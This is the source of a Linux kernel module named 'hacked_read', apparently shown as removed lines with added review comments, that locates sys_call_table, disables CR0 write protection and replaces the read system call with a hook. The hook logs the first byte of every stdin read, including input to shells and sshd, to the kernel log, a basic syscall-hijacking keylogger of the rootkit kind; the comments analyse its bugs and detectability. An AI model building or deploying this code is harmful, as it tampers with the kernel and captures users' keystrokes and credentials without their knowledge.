- #include <linux/module.h>
- #include <linux/kernel.h>
- #include <linux/init.h>
- #include <linux/errno.h>
- #include <linux/slab.h>
- #include <linux/string.h>
- #include <linux/syscalls.h>
- #include <linux/version.h>
- #include <linux/unistd.h>
- #include <linux/time.h>
- #include <linux/preempt.h>
- #include <linux/delay.h>
- #include <linux/cred.h>
- #include <linux/sched.h>
- #include <asm/uaccess.h>
- #include <asm/paravirt.h>
- #include <asm-generic/bug.h>
- #include <asm/segment.h>
- #include <asm/atomic.h>
- // Size constant; not referenced anywhere in the visible listing.
- #define BUFFER_SIZE 512
- // Number of slots in pids[]. NOTE(review): nothing in this listing checks that a
- // PID is below this value before it is used as an index — confirm against the
- // running kernel's configured PID limit.
- #define PID_MAX 32768
- // Prefix used by every log macro below; also passed to MODULE_DESCRIPTION.
- #define MODULE_NAME "hacked_read"
- // Debug log gated on a `debug` identifier that is not declared in the visible
- // listing; the macro is never expanded here, so the compiler never sees that.
- #define dbg( format, arg... ) do { if ( debug ) pr_info( MODULE_NAME ": %s: " format , __FUNCTION__ , ## arg ); } while ( 0 )
- // Thin wrappers over pr_err / pr_info / pr_warn that prepend MODULE_NAME.
- #define err( format, arg... ) pr_err( MODULE_NAME ": " format, ## arg )
- #define info( format, arg... ) pr_info( MODULE_NAME ": " format, ## arg )
- #define warn( format, arg... ) pr_warn( MODULE_NAME ": " format, ## arg )
- // Module metadata.
- MODULE_DESCRIPTION( MODULE_NAME );
- MODULE_VERSION( "0.2" );
- MODULE_LICENSE( "GPL" );
- MODULE_AUTHOR( "module author <mail@domain.com>" );
- // Held (with interrupts saved/disabled) around each write to the syscall table.
- static DEFINE_SPINLOCK( mLock );
- // Handler that occupied the __NR_read slot before this module replaced it;
- // called from the hook and written back on unload.
- static unsigned long ( *original_read ) ( const struct pt_regs *regs );
- // Address of sys_call_table as resolved by find_sym(); NULL if the lookup failed.
- // NOTE(review): unlike the other globals this one is not static.
- void **sct;
- // IRQ state saved by spin_lock_irqsave(). NOTE(review): this is one shared
- // file-scope variable used by both init and exit rather than a local in each caller.
- static unsigned long flags; // irq flags
- // Number of tasks currently executing inside hacked_read_test().
- static atomic_t LOCK_NUMBER_ATOM = ATOMIC_INIT(0);
- // Snapshot of the counter taken during unload. NOTE(review): declared unsigned
- // but printed with %lld.
- static unsigned long long LOCK_NUMBER_ATOM_VAL;
- // pids[p] is true while the task with PID p is inside hacked_read_test().
- static bool pids[ PID_MAX ];
- // Clear CR0 bit 16 (WP, write protect) on the executing CPU: the AND mask
- // 0xfffffffffffeffff keeps every bit except bit 16. With WP clear,
- // supervisor-mode writes to read-only pages no longer fault.
- // rax is preserved by the push/pop pair instead of being declared as a clobber.
- // NOTE(review): the statement carries no "memory" clobber, so the compiler is
- // not told to keep ordinary stores on the intended side of the CR0 write.
- // NOTE(review): while WP is clear, every kernel write on this CPU bypasses
- // read-only page protection, not only the one the caller intends.
- static inline void rw_enable( void ) {
- asm volatile ( "pushq %rax \n"
- "movq %cr0, %rax \n"
- "andq $0xfffffffffffeffff, %rax \n"
- "movq %rax, %cr0 \n"
- "popq %rax " );
- }
- // Read the current value of control register CR0 on the executing CPU and
- // return it. Callers use the result as the value to write back later.
- static inline uint64_t getcr0(void) {
- register uint64_t ret = 0;
- asm volatile (
- "movq %%cr0, %0\n"
- :"=r"(ret)
- );
- return ret;
- }
- // Write `val` into CR0 on the executing CPU.
- // Despite the name, this does not set the WP bit itself: it writes back
- // whatever the caller passes, so write protection is only re-enabled if the
- // saved value had WP set.
- static inline void rw_disable( register uint64_t val ) {
- asm volatile(
- "movq %0, %%cr0\n"
- :
- :"r"(val)
- );
- }
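- // Resolve a kernel symbol name to its address by walking the symbol table
- // with kallsyms_on_each_symbol().
- //
- // sym: NUL-terminated symbol name to look for.
- // Returns the address of the first symbol whose name matches, or NULL when no
- // visited symbol matched. Callers must check for NULL before dereferencing.
- static void* find_sym( const char *sym ) {
-     // File-lifetime storage written by the nested callback; presumably static so
-     // the callback does not have to reference a local of the enclosing function.
-     static unsigned long faddr = 0; // static !!!
-     // ----------- nested functions are a GCC extension ---------
-     // Callback: `data` is the wanted name, `sym` (shadowing the outer parameter)
-     // is the name of the symbol being visited. A non-zero return ends the walk.
-     int symb_fn( void* data, const char* sym, struct module* mod, unsigned long addr ) {
-         if( 0 == strcmp( (char*)data, sym ) ) {
-             faddr = addr;
-             return 1;
-         } else return 0;
-     };// --------------------------------------------------------
-     // faddr outlives each call, so without this reset a failed lookup would
-     // hand back the address found by an earlier, unrelated lookup.
-     faddr = 0;
-     kallsyms_on_each_symbol( symb_fn, (void*)sym );
-     return (void*)faddr;
- }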
- // Replacement handler stored in the __NR_read slot of the syscall table.
- // It forwards the call to the saved original handler and returns that
- // handler's result unchanged; for reads on fd 0 it additionally writes the
- // first byte of the caller's buffer to the kernel log.
- // The counter and the pids[] entry bracket the call so that module unload can
- // tell which tasks are still inside this function.
- // NOTE(review): this copies bytes of user input (which can include typed
- // credentials) into the kernel log, whose audience is far wider than the
- // process that issued the read.
- static unsigned long hacked_read_test( const struct pt_regs *regs ) {
- unsigned long r = 1;
- // Syscall arguments are taken from the saved registers: di holds the file
- // descriptor, si the caller's buffer pointer.
- unsigned int fd = regs->di;
- char *buf = (char*) regs->si;
- atomic_inc( &LOCK_NUMBER_ATOM );
- // NOTE(review): the index is not checked against PID_MAX; a PID of 32768 or
- // above writes past the end of pids[].
- pids[ task_pid_nr( current ) ] = true;
- r = original_read( regs );
- if ( fd == 0 ) { // fd == 0 --> stdin (sh, sshd)
- // NOTE(review): buf comes from the caller's registers and is dereferenced
- // directly; it is not validated, it is not guaranteed to be NUL-terminated,
- // and r (the original handler's result) is never consulted, so this can
- // fault or log bytes that this read did not produce.
- if ( strlen( buf ) > 0 )
- info( "hacked_read: %c\n", buf[ 0 ] );
- }
- atomic_dec( &LOCK_NUMBER_ATOM );
- // NOTE(review): after the decrement the task is still executing this
- // function, so unload can observe a zero counter while code here is running.
- pids[ task_pid_nr( current ) ] = false;
- return r;
- }
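- // Module entry point: locate sys_call_table, remember the current __NR_read
- // handler in original_read, and replace the table entry with hacked_read_test.
- // Returns 0 on success, or -ENOENT when the table symbol cannot be resolved.
- int hacked_read_init( void ) {
-     register uint64_t cr0;
-     int cpu;
-     sct = find_sym( "sys_call_table" );
-     // find_sym() yields NULL when the symbol is not found; indexing a NULL
-     // table below would crash the kernel, so fail the load instead.
-     if ( !sct ) {
-         err( "sys_call_table not found, refusing to load\n" );
-         return -ENOENT;
-     }
-     original_read = (void *)sct[ __NR_read ];
-     // NOTE(review): `cpu` is never used in the loop body and nothing here moves
-     // execution to another CPU, so every iteration repeats the same write from
-     // whichever CPU is running this function.
-     for_each_present_cpu( cpu ) {
-         // Interrupts stay off on this CPU for as long as WP is clear.
-         spin_lock_irqsave( &mLock, flags );
-         // Saved so the exact previous CR0 value can be written back.
-         cr0 = getcr0( );
-         rw_enable( );
-         // From here on the __NR_read entry points into module memory instead of
-         // kernel text, which is what a syscall-table integrity check looks for.
-         sct[ __NR_read ] = hacked_read_test;
-         rw_disable( cr0 );
-         spin_unlock_irqrestore( &mLock, flags );
-     }
-     info( "Module was loaded\n" );
-     return 0;
- }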
- // Module exit point: write the saved original handler back into the
- // __NR_read slot, then wait until no task is counted as being inside
- // hacked_read_test() before returning.
- // NOTE(review): sct is dereferenced without a NULL check here.
- void hacked_read_exit( void ) {
- register uint64_t cr0;
- int cpu;
- unsigned int i;
- // Same lock / save CR0 / clear WP / write / restore CR0 sequence as in init.
- // NOTE(review): `cpu` is unused in the body, so each iteration repeats the
- // same write from the current CPU.
- for_each_present_cpu( cpu ) {
- spin_lock_irqsave( &mLock, flags );
- cr0 = getcr0( );
- rw_enable( );
- sct[__NR_read] = original_read;
- rw_disable( cr0 );
- spin_unlock_irqrestore( &mLock, flags );
- }
- // The counter is held across the call to the original handler, so a task
- // blocked in a read that was entered through the hook keeps it non-zero and
- // keeps this loop polling until that read returns.
- LOCK_NUMBER_ATOM_VAL = atomic_read( &LOCK_NUMBER_ATOM );
- while ( LOCK_NUMBER_ATOM_VAL != 0 ) {
- info( "Locked. LOCK_NUMBER_ATOM_VAL = %lld\n", LOCK_NUMBER_ATOM_VAL );
- // Log every PID still flagged as inside the hook.
- for( i = 0; i < PID_MAX; i++ ) {
- if ( pids[ i ] ) {
- info( "Locked. pid = %d\n", i );
- }
- }
- // Poll every 5 seconds.
- msleep( 5000 );
- LOCK_NUMBER_ATOM_VAL = atomic_read( &LOCK_NUMBER_ATOM );
- }
- // NOTE(review): a zero counter does not prove that no task is executing hook
- // code; a task can be inside hacked_read_test() before its increment or
- // after its decrement when this check passes.
- info( "Open. LOCK_NUMBER_ATOM_VAL = %lld\n", LOCK_NUMBER_ATOM_VAL);
- info( "Module was unloaded\n" );
- }
- // Register the load and unload entry points with the module loader.
- module_init( hacked_read_init );
- module_exit( hacked_read_exit );